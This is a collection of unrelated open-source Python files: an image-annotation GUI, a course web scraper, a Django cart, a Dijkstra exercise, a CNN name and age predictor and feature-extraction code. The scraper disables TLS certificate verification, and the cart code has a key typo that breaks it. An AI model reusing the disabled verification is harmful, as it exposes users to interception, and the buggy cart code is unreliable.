self._build_select_all_subfolders_button()\r\n self._build_trash_button()\r\n self._build_counter(0)\r\n \r\n # ----------------------------------------------- BUILDERS (MISC) -----------------------------------------------\r\n \r\n def 
_build_trash_button(self):\r\n self.trash_button = make_button(self.root, text='Clean List', width=9, command=self.__trash_list,\r\n row=26, column=1, columnspan=1, inner_pady=5, outer_padx=0,\r\n outer_pady=(10, 15))\r\n\r\n\r\n def _build_select_superdir_button(self):\r\n self.select_data_cube_button = make_button(self.root, text=\"Open OP\\nFolder\",\r\n command=self.__add_data_cube_dirs, inner_padx=10, inner_pady=10,\r\n outer_padx=15, row=25, rowspan = 1, column=0, width=11, outer_pady=(5, 5))\r\n def _build_labelling_entry(self):\r\n labelling_text = make_text(self.root, content = \"File-Filter:\", row=24, column=0, width=14, bg=tkcolour_from_rgb((BACKGROUND)), padx=0, state=NORMAL, pady=0) \r\n self.labelling_entry = make_entry(self.root, row=25, column=0, width=11)\r\n self.labelling_entry.bind(\"\", self.__update_labelling)\r\n \r\n def _build_counter(self, n):\r\n self.lcounter_text = make_text(self.root, content = \"N: \" + str(n), row=23, column=0, width=14, bg=tkcolour_from_rgb((BACKGROUND)), padx=0, state=NORMAL, pady=0) \r\n \r\n def _build_select_all_subfolders_button(self):\r\n self.select_data_cube_button = make_button(self.root, text=\"Open Project\\nFolder\",\r\n command=self.__add_data_cube_subdirs, inner_padx=10, inner_pady=10,\r\n outer_padx=15, row=26, rowspan=1, column=0, width=11, outer_pady=(5, 5))\r\n\r\n\r\n\r\n def _build_selection_box(self):\r\n self.selection_listbox = make_listbox(self.root, row=2, column=0, rowspan=21, padx=(0, 15), pady=(0, 15), height = 35, selectmode = \"SINGLE\")\r\n self.selection_listbox.bind('<>', self.__update_selected_data_cube)\r\n \r\n # ---------------------------------------------- IMAGE -----------------------------------------------\r\n \r\n def _build_original_image_left(self, data):\r\n if data is None:\r\n # Placeholder\r\n self.original_image = make_label(self.root, \"Navigation:\\n Mouse-Left or 'q' to place point\\n '+' or 'w' to zoom in\\n '-' or 's' to zoom out\\n arrows to change image\", row=1, column=1, rowspan=25,\r\n columnspan=1, inner_pady=30, inner_padx=40, outer_padx=(15, 10),\r\n outer_pady=(15, 10))\r\n else:\r\n #data = np.asarray(rgb_image_to_hsi_array(self.original_image_data)).reshape((480, 640))\r\n (self.original_image_graph, self.original_image, self.image_array) = \\\r\n make_image(self.root, data, row=1, column=1, columnspan=1, rowspan=25, lower_scale_value=None,\r\n upper_scale_value=None, color_rgb=BACKGROUND, original=True, figheight=3.5, figwidth=4.5, img = self.original_image, axs = self.original_image_graph, figu = self.original_image_graph)\r\n self.root.bind_all('', self.__next_not)\r\n self.root.bind_all('', self.__next_hot)\r\n self.root.bind_all('1', self.__next_one)\r\n self.root.bind_all('2', self.__next_two)\r\n #self.original_image.get_tk_widget().bind('', self.__update_cursor)\r\n self.original_image.get_tk_widget().focus_force()\r\n \r\n def _build_original_image_right(self, data):\r\n if data is None:\r\n # Placeholder\r\n self.original_image_r = make_label(self.root, \"Navigation:\\n Mouse-Left or 'q' to place point\\n '+' or 'w' to zoom in\\n '-' or 's' to zoom out\\n arrows to change image\", row=1, column=2, rowspan=25,\r\n columnspan=1, inner_pady=30, inner_padx=40, outer_padx=(15, 10),\r\n outer_pady=(15, 10))\r\n else:\r\n #data = np.asarray(rgb_image_to_hsi_array(self.original_image_data)).reshape((480, 640))\r\n (self.original_image_graph_r, self.original_image_r, self.image_array_r) = \\\r\n make_image(self.root, data, row=1, column=2, columnspan=1, rowspan=25, 
lower_scale_value=None,\r\n upper_scale_value=None, color_rgb=BACKGROUND, original=True, figheight=3.5, figwidth=4.5, img = self.original_image_r, axs = self.original_image_graph_r, figu = self.original_image_graph_r) \r\n \r\n def __add_from_data_cube_paths(self, event = None):\r\n self.selection_listbox.delete(0,'end')\r\n cc=0\r\n for dc_path in self.data_cube_paths:\r\n concat_path = os.path.basename(os.path.normpath(dc_path)) \r\n self.selection_listbox.insert(END, concat_path)\r\n self.selection_listbox.config(width=18)\r\n cc=cc+1\r\n self._build_counter(cc)\r\n \r\n def __add_data_cube(self, sub_dir):\r\n contents = os.listdir(sub_dir)\r\n dc_path = [sub_dir + \"/\" + i for i in contents if \"before\" in i] # takes first data cube it finds\r\n if len(dc_path) > 0:\r\n dc_path = dc_path[0]\r\n if dc_path in self.data_cube_paths:\r\n messagebox.showerror(\"Error\", \"That data has already been added.\")\r\n else:\r\n self.data_cube_paths.append(dc_path)\r\n\r\n def __add_data_cube_subdirs(self):\r\n super_dir = self.__get_path_to_dir(\"Please select folder containing all the OP folders.\")\r\n sub_dirs = self.__get_sub_folder_paths(super_dir, True)\r\n for sub_dir in sub_dirs:\r\n if \"/hot/\" not in sub_dir or \"/not/\" not in sub_dir:\r\n if len(glob.glob(sub_dir + \"/*before*\"))>=1:\r\n self.__add_data_cube(sub_dir)\r\n self.__add_from_data_cube_paths()\r\n\r\n def __get_path_to_dir(self, title):\r\n path = filedialog.askdirectory(parent=self.root, title=title)\r\n return path\r\n\r\n @staticmethod\r\n def __get_sub_folder_paths(path_to_main_folder, recursive = False): \r\n sub_folders = sorted(glob.glob(path_to_main_folder+\"/**/\", recursive = recursive))\r\n return sub_folders\r\n \r\n def _insert_data_cube_paths(self):\r\n for dc_path in self.data_cube_paths:\r\n concat_path = os.path.basename(os.path.normpath(dc_path))\r\n self.selection_listbox.insert(END, concat_path)\r\n self.selection_listbox.config(width=18)\r\n self._build_counter(len(self.data_cube_paths))\r\n \r\n def __trash_list(self):\r\n self.data_cube_paths = []\r\n self.selection_listbox.delete(0,'end')\r\n self.coords_list = [(None, None) for _ in range(1000000)]\r\n self.__remove_pt('all')\r\n self._build_counter(len(self.data_cube_paths))\r\n \r\n # ------------------------------------ Selection Listbox (control) ----------------------------\r\n \r\n def __next_hot(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n copy_tree(os.path.dirname(dc_path), base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n \r\n def __next_not(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n 
else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n def __next_one(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n \r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n shutil.copy(glob.glob(os.path.dirname(dc_path) + \"/*before*\")[0], base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n def __next_two(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n \r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n shutil.copy(glob.glob(os.path.dirname(dc_path) + \"/*after*\")[0], base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n # ------------------------------------------------- Saving / Loading --------------------------------------------------\r\n \r\n def __save_mask(self):\r\n polygon = [point for point in self.coords_list if point != (None, None)]\r\n if len(polygon)>0:\r\n img = Image.new('L', (640, 480), 0)\r\n ImageDraw.Draw(img).polygon(polygon, outline=1, fill=1)\r\n mask_array = np.array(img)\r\n path = os.path.dirname(self.get_selected_data_cube_path())\r\n if not os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n os.mkdir(path + '/'+self.listener.output_folder_hypergui)\r\n output_path = path + '/'+self.listener.output_folder_hypergui + \"/mask\" + '.csv'\r\n np.savetxt(output_path, mask_array, delimiter=\",\", fmt=\"%d\")\r\n else:\r\n pass\r\n \r\n def __save_points(self):\r\n data = self.__get_coords_list()\r\n if len(data)>0:\r\n path = 
os.path.dirname(self.get_selected_data_cube_path())\r\n if self.delete_content:\r\n if os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n shutil.rmtree(path + '/'+self.listener.output_folder_hypergui)\r\n if not os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n os.mkdir(path + '/'+self.listener.output_folder_hypergui)\r\n output_path = path + '/'+self.listener.output_folder_hypergui + \"/MASK_COORDINATES\" + '.csv'\r\n np.savetxt(output_path, data, delimiter=\",\", fmt=\"%1.2f\")\r\n else:\r\n pass\r\n \r\n def __save_all(self):\r\n self.__save_coords(True)\r\n \r\n \r\n ","repo_name":"JanOdenthal/Rhinoplastic_Paper","sub_path":"RSTinder/HyperGuiModules/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":16746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"15403062839","text":"import urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter URL: ')\ncount = input('Enter count: ')\n#Turn into an integer, this is how many links it will give you\ncountx = int(count)\nposition = input('Enter position: ')\n#Turn into integer, this is the position it will begin on\npositionx = int(position)\n\nhtml = urllib.request.urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, 'html.parser')\nnames = list()\nticker = 0\n\n# Retrieve all of the anchor tags\ntags = soup('a')\n\n#As long as we haven't maxed out, keep the loop going\nwhile ticker != countx:\n\n #Run it again and reset\n html = urllib.request.urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, 'html.parser')\n tags = soup('a')\n #Track with: print(\"Cycle 1A\")\n\n #Start at the position and go x amount of times\n for tag in tags[(positionx - 1):]:\n\n print(\"Retrieving: \", tag.get('href', None))\n url = tag.get('href', None)\n ticker = ticker + 1\n # Track with: print(\"Cycle 1B\")\n break\n\n #names.append(stag)\n if ticker == countx:\n break\n\n #Uncommenting below would get you the exact names\n #for stag in tag:\n # ticker = ticker + 1\n # names.append(stag)\n # if ticker = countx:\n # break\n #print(stag)\n\n#print(tag[0:4])\n#print(names[positionx])\n","repo_name":"bradmdesign/PY4E-UoM","sub_path":"Course 3 - Using Python to Access Web Data/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14585905334","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom shop.models import Product\n\n\nclass Cart(object):\n\n def __init__(self, request):\n \"\"\"\n Initialize the cart\n \"\"\"\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n # save an empty cart in the session\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart = cart\n\n def add(self, product, quantity=1, update_quantity=False):\n \"\"\"\n Add a product to the cart or update it's quantity\n \"\"\"\n product_id = str(product.id)\n if product_id not in self.cart:\n self.cart[product_id] = {'quantity': 0,\n 'price': str(product.price)}\n if update_quantity:\n self.cart[product_id]['quantity'] = quantity\n else:\n self.cart[product_id]['quntity'] += quantity\n self.save()\n\n def save(self):\n self.session.modified = True\n\n\n","repo_name":"akashgiricse/online-shop","sub_path":"myshop/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"29443017428","text":"# 2. Доработать алгоритм Дейкстры (рассматривался на уроке), чтобы он дополнительно возвращал список вершин,\r\n# которые необходимо обойти.\r\n\r\ng = [\r\n [0, 0, 1, 1, 9, 0, 0, 0],\r\n [0, 0, 9, 4, 0, 0, 5, 0],\r\n [0, 9, 0, 0, 3, 0, 6, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 0, 0, 0, 5, 0],\r\n [0, 0, 7, 0, 8, 1, 0, 0],\r\n [0, 0, 0, 0, 0, 1, 2, 0],\r\n]\r\n\r\n\r\ndef dijkstra(graph, start):\r\n \"\"\"\r\n Функция на основе алгоритма Дейкстры, которая возвращает:\r\n - список кратчайших путей и их вес до всех остальных вершин\r\n - словарь вершин, через которые пройдет кратчайший путь\r\n \"\"\"\r\n length = len(graph)\r\n is_visited = [False] * length\r\n cost = [float('inf')] * length\r\n parent = [-1] * length\r\n way = {vertex: 'Нет пути' for vertex in range(length)}\r\n\r\n cost[start] = 0\r\n way[start] = 'Начальная вершина'\r\n min_cost = 0\r\n\r\n while min_cost < float('inf'):\r\n is_visited[start] = True\r\n\r\n for i, vertex in enumerate(graph[start]):\r\n if vertex != 0 and not is_visited[i]:\r\n\r\n if cost[i] > vertex + cost[start]:\r\n cost[i] = vertex + cost[start]\r\n parent[i] = start\r\n\r\n min_cost = float('inf')\r\n for i in range(length):\r\n if min_cost > cost[i] and not is_visited[i]:\r\n min_cost = cost[i]\r\n start = i\r\n\r\n for rev in range(length):\r\n if not parent[rev] == -1:\r\n way[rev] = [rev]\r\n while way[rev][-1] >= 0:\r\n way[rev].append(parent[way[rev][-1]])\r\n if way[rev][-1] == -1:\r\n way[rev].remove(-1)\r\n\r\n return cost, way\r\n\r\n\r\nif __name__ == '__main__':\r\n s = int(input('От какой вершины идти: '))\r\n cost_from, ways_from = dijkstra(g, s)\r\n\r\n print(f'Начальная вершина: {s}')\r\n for v, w in ways_from.items():\r\n if not w == 'Начальная вершина' and not w == 'Нет пути':\r\n print(f'Путь в вершину {v} из начальной: {\" -> \".join(map(str, w[::-1]))}. Вес пути {cost_from[v]}')\r\n elif w == 'Нет пути':\r\n print(f'Нет пути до вершины {v}')\r\n","repo_name":"MaximJoinedGit/Algorithms-and-data-structures-on-Python","sub_path":"lesson_8/homework_8.2.py","file_name":"homework_8.2.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7214584529","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Path:\n db = \"pup_pathways_test_db\"\n def __init__(self, data) -> None:\n self.id = data['id']\n self.coordinates = data['coordinates']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.user_id = data['user_id']\n\n @classmethod\n def create_path(cls, form_data):\n query=\"\"\"\n INSERT INTO path (user_id, coordinates)\n VALUES (%(user_id)s, %(coordinates)s)\n \"\"\"\n new_path_id = connectToMySQL(cls.db).query_db(query, form_data)\n print(new_path_id)\n return new_path_id\n\n @classmethod\n def show_all_paths(cls):\n query = \"\"\"\n SELECT *\n FROM path\n \"\"\"\n all_paths = connectToMySQL(cls.db).query_db(query)\n return all_paths\n","repo_name":"a-a-garcia/Pup_Pathways","sub_path":"flask_app/models/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72114591579","text":"import time\nimport psutil\nimport collections\nfrom loguru import logger\n\n\nData = collections.namedtuple('Data', ['time', 'value'])\n\n\ndef get_local_utilization():\n \"\"\"Get the CPU usage and memory usage\"\"\"\n cpu_usage = psutil.cpu_percent()\n memory_usage = psutil.virtual_memory().percent\n return cpu_usage, memory_usage\n\n\nclass SysInfo:\n \"\"\"Storing the system information of local and server\"\"\"\n def __init__(self):\n \n self.cpu_usage = []\n self.memory_usage = []\n self.local_delay = []\n self.offload_delay = []\n self.bandwidth = []\n self.local_pending_task = 0\n\n def update_local_utilization(self):\n \"\"\"Update local utilization including cpu usage and memory usage\"\"\"\n t = time.time()\n \n cpu_usage, memory_usage = get_local_utilization()\n self.cpu_usage.append(Data(t, cpu_usage))\n self.memory_usage.append(Data(t, memory_usage))\n\n def append_local_delay(self, cur_time, delay):\n \n data = Data(cur_time, delay)\n self.local_delay.append(data)\n\n def append_offload_delay(self, cur_time, delay):\n\n data = Data(cur_time, delay)\n self.offload_delay.append(data)\n\n def append_bandwidth(self, cur_time, delay):\n data = Data(cur_time, delay)\n self.bandwidth.append(data)\n\n\n\n\n\n","repo_name":"MSNLAB/SmartEye","sub_path":"local/sys_info.py","file_name":"sys_info.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"69"}
+{"seq_id":"15648296624","text":"#! python3\n# findToDeleteLargeFiles.py - goes through files on computer and finds largest files, adds them to list and returns list\n\n# This program will need to:\n# from home directory, walk through all files and add to a list if they are certain size. Return list\n\nimport os\nfrom pathlib import Path\np = Path.cwd()\nbigFiles = []\nfor file in os.listdir(str(p)):\n if os.path.getsize(file) > 1000:\n bigFiles.append(file)\n\nprint(bigFiles)\n","repo_name":"ktmurphy/WorkProjects","sub_path":"Coding/Ch 10/findToDeleteLargeFiles.py","file_name":"findToDeleteLargeFiles.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36575913013","text":"\"\"\"\r\nTitle: Name and age Prediction based on a person's Image using a Convolutional Neural Network\r\n\r\nAuthor: Moein Roghani\r\nEmail: roghanim@mcmaster.ca\r\n\r\nDescription: In this project, our goal is to create a model that can predict a person's name and their age, \r\nbased on their image using a Convolutional Neural Network (CNN) which we have implemented for each. \r\n\r\nDatasets used for training:\r\n- lfw: The data set contains more than 13,000 images of faces (5749 people) collected from the web\r\n http://vis-www.cs.umass.edu/lfw/}{http://vis-www.cs.umass.edu/lfw/\r\n- Names100: Contains 80,000 unconstrained human face images, including 100 popular names and 800 images per name\r\n https://exhibits.stanford.edu/data/catalog/tp945cq9122\r\n- IMDB-WIKI: 500k+ face images with age and gender labels\r\n https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/\r\n\"\"\"\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Data Processing\r\n\r\n# The dataset is organized into multiple folders, with each folder representing a label (name or age),//\r\n# //and the images inside each folder corresponding to the data points for that name. So basically our training set is images that are each inside// \r\n# //their labelled classification folder.\r\n\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\ndata_directory = 'path_to_dataset_directory'\r\n\r\n\r\n#loading data from the directory and making our X_train set which is the data points, and Y_train which is their label.\r\ndef load_data(data_directory):\r\n X_train = [] \r\n Y_train = []\r\n data = []\r\n class_labels_dic = {}\r\n \r\n for value, label in enumerate(os.listdir(data_directory)):\r\n #assign an integer value for each class\r\n class_labels_dic[label] = value\r\n \r\n #add the data with its label\r\n class_folder = os.path.join(data_directory, label)\r\n for image in os.listdir(class_folder):\r\n X_train.append(os.path.join(class_folder, image))\r\n Y_train.append(value)\r\n data.append((os.path.join(class_folder, image), value))\r\n \r\n return data, class_labels_dic, np.array(X_train), np.array(Y_train)\r\n\r\ndata, class_labels_dic, X_train, Y_train = load_data(data_directory)\r\n\r\n\r\n#preprocessing the image by converting it to an array representing the image\r\ndef preprocess_image(image, size = (224, 224)):\r\n \r\n #resize the image to a specific dimension and convert it to an RGB channel\r\n image = Image.open(image).convert('RGB')\r\n image = image.resize(size)\r\n \r\n #convert image to an array of pixel values (RGB value of every pixel)\r\n #it is a matrix of size 224*224, where each item is an array of size 3 (RGB)\r\n image_array = np.array(image) / 255.0\r\n \r\n return image_array\r\n\r\n\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Convolutional Neural Network (CNN) Architecture\r\n\r\n# Some notes on CNN:\r\n# We use a Dropout layer to prevent overfitting\r\n# ReLU activation is basically f(x) = max(0, x)\r\n# Softmax activation is a smooth approximation to the max function, making it differentiable for second derivates as well in the case of using Newton's//\r\n# //method by second Taylor series approximation \r\n# We need a 
fully-connected layer between the Convolutional outputs and the final layer to be able to make predictions based on all the labels\r\n# We use Categorical Cross Entropy as a loss function for multi-class classification \r\n# We use Mean Squared Error (MSE) as a loss function for regression\r\n\r\nimport tensorflow as tf\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\r\nfrom tensorflow.keras.layers import BatchNormalization\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\n#mini-batch gradient descent method for faster updates when we have large datasets\r\ndef data_batch(data, batch_size=32, num_classes=None):\r\n while True:\r\n np.random.shuffle(data)\r\n for i in range(0, len(data), batch_size):\r\n batch_data = data[i:i+batch_size]\r\n X_batch = np.array([preprocess_image(img_path) for img_path, _ in batch_data], dtype=np.float32)\r\n y_batch = np.array([label for _, label in batch_data])\r\n y_batch = tf.keras.utils.to_categorical(y_batch, num_classes=num_classes)\r\n yield X_batch, y_batch\r\n\r\n\r\n#CNN Architecture for Name Prediction using Multi-Class Classification\r\ndef name_CNN_Model(input_shape, num_classes):\r\n model = Sequential([\r\n Conv2D(32, (3, 3), activation='relu', input_shape=input_shape), #convolutional layer\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Conv2D(64, (3, 3), activation='relu'),\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Conv2D(128, (3, 3), activation='relu'),\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Flatten(),\r\n Dense(128, activation='relu'), #first fully connected layers\r\n Dropout(0.5), #for regularization\r\n \r\n #fully connected layers (Number of neurons should equal to the number of classes)\r\n Dense(num_classes, activation='softmax') \r\n ])\r\n\r\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n return model\r\n\r\n\r\n#CNN Architecture for Age Prediction using Regression (Age is a continuous valued variable)\r\ndef age_CNN_Model(input_shape, num_classes):\r\n model = Sequential([\r\n Conv2D(32, (3, 3), activation='relu', input_shape=input_shape), #Convolutional Layer\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n Dropout(0.25),\r\n\r\n Conv2D(64, (3, 3), activation='relu'),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n Dropout(0.25),\r\n\r\n Flatten(),\r\n Dense(128, activation='relu'), #first fully connected layers\r\n Dropout(0.5), #for regularization\r\n \r\n #fully connected layers (Number of neurons should equal to the number of classes)\r\n Dense(num_classes, activation='linear')\r\n ])\r\n \r\n model.compile(optimizer='adam', loss='mean_squared_error')\r\n\r\n return model\r\n\r\n\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Model Training \r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain_data, val_data = train_test_split(data, test_size=0.2, 
random_state=42)\r\n\r\n\r\n#it is a matrix of size 224*224, where each item is an array of size 3 (RGB)\r\ninput_shape = (224, 224, 3)\r\nnum_classes = len(class_labels_dic.values())\r\n\r\n#need more testing for finding a better epoch\r\n#the values are taken from a similar model\r\nbatch_size = 32\r\nepochs = 20\r\n\r\n#create our model and our batch for training and testing sets\r\ntrain_data_gen = data_batch(train_data, batch_size, num_classes)\r\nval_data_generator = data_batch(val_data, batch_size, num_classes)\r\n\r\n\r\n#fit model on training data for age prediction\r\nmodel = age_CNN_Model(input_shape, num_classes)\r\nhistory = model.fit(\r\n train_data_gen,\r\n steps_per_epoch=len(train_data) // batch_size,\r\n validation_data=val_data_generator,\r\n validation_steps=len(val_data) // batch_size,\r\n epochs=epochs\r\n)\r\n\r\n\r\n#fit model on training data for name prediction\r\nmodel = name_CNN_Model(input_shape, num_classes)\r\nhistory = model.fit(\r\n train_data_gen,\r\n steps_per_epoch=len(train_data) // batch_size,\r\n epochs=epochs\r\n)","repo_name":"MoeinRoghani/CNN-Name-and-Age-Identification","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
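+# A minimal inference sketch for the trained name model above, assuming
+# 'some_face.jpg' as a hypothetical input path; class_labels_dic is inverted to
+# map the argmax of the softmax output back to a name label.
+value_to_label = {v: k for k, v in class_labels_dic.items()}
+probs = model.predict(np.expand_dims(preprocess_image('some_face.jpg'), axis=0))
+print(value_to_label[int(np.argmax(probs[0]))])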
+{"seq_id":"16292866475","text":"from tkinter import *\n\nif __name__ == '__main__':\n root = Tk()\n canvas = Canvas(root, bg=\"#ffa827\", height=512, width=512)\n coordinates = 50, 100, 150, 200\n\n arc = canvas.create_arc(coordinates, start=0, extent=45, fill=\"#8d1832\")\n canvas.pack()\n\n root.mainloop()\n","repo_name":"mertturkmenoglu/python-examples","sub_path":"examples/gui/E008_Canvas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3204604167","text":"import pickle\nimport numpy as np\nimport cyvlfeat as vlfeat\nfrom scipy.spatial.distance import cdist\nimport cv2\nfrom os.path import join\nimport matplotlib.image as mpimg\n\n\ndef build_vocab(images, vocab_size):\n dim = 128 # length of the SIFT descriptors that you are going to compute.\n vocab = np.zeros((vocab_size, dim))\n total_SIFT_features = np.zeros((20 * len(images), dim))\n\n for i, img in enumerate(images):\n frames, descriptors = vlfeat.sift.dsift(img, step=1, fast=True)\n if descriptors.shape[0] > 20:\n idx = np.random.choice(descriptors.shape[0], size=20, replace=False)\n elif descriptors.shape[0] > 0:\n idx = np.random.choice(descriptors.shape[0], size=20, replace=True)\n else:\n continue\n total_SIFT_features[i * 20:(i + 1) * 20] = descriptors[idx, :]\n vocab = vlfeat.kmeans.kmeans(total_SIFT_features, vocab_size)\n\n return vocab\n\n\ndef bags_of_sifts(images, vocab_filename):\n with open(vocab_filename, 'rb') as f:\n vocab = pickle.load(f)\n\n feats = np.zeros(shape=(len(images), vocab.shape[0]))\n for idx, img in enumerate(images):\n frames, descriptors = vlfeat.sift.dsift(img, step=20, fast=True)\n D = cdist(descriptors, vocab)\n feature = [0] * vocab.shape[0]\n for d in D:\n feature[np.argmin(d)] += 1\n feature = np.asarray(feature)\n if np.linalg.norm(feature) != 0:\n feature = feature / np.linalg.norm(feature)\n feats[idx] = feature\n\n return feats\n\n\ndef bags_of_sifts_spm(imgs, vocab_filename, depth):\n with open(vocab_filename, 'rb') as f:\n vocab = pickle.load(f)\n\n vocab_size = vocab.shape[0]\n feats = []\n\n # compute the total num of cells in all levels\n num_cell = 0\n for level in range(depth):\n num_cell += 4 ** level\n feats = np.zeros(shape=(len(imgs), vocab_size * num_cell))\n\n for idx, img in enumerate(imgs):\n\n this_feature = []\n for level in range(depth):\n cell_per_line = 2 ** level\n width, height, weight = getLevelInfo(img, level, depth)\n # print('level: {0} height: {1} width: {2}'.format(level, width, height))\n\n for index in range(cell_per_line ** 2):\n min_x = (index // cell_per_line) * width\n max_x = (index // cell_per_line + 1) * width\n min_y = (index % cell_per_line) * height\n max_y = (index % cell_per_line + 1) * height\n\n patch = img[min_x:max_x, min_y:max_y]\n frames, descriptors = vlfeat.sift.dsift(patch, step=8, fast=True)\n D = cdist(descriptors, vocab)\n feature = np.zeros(shape=(vocab.shape[0]))\n 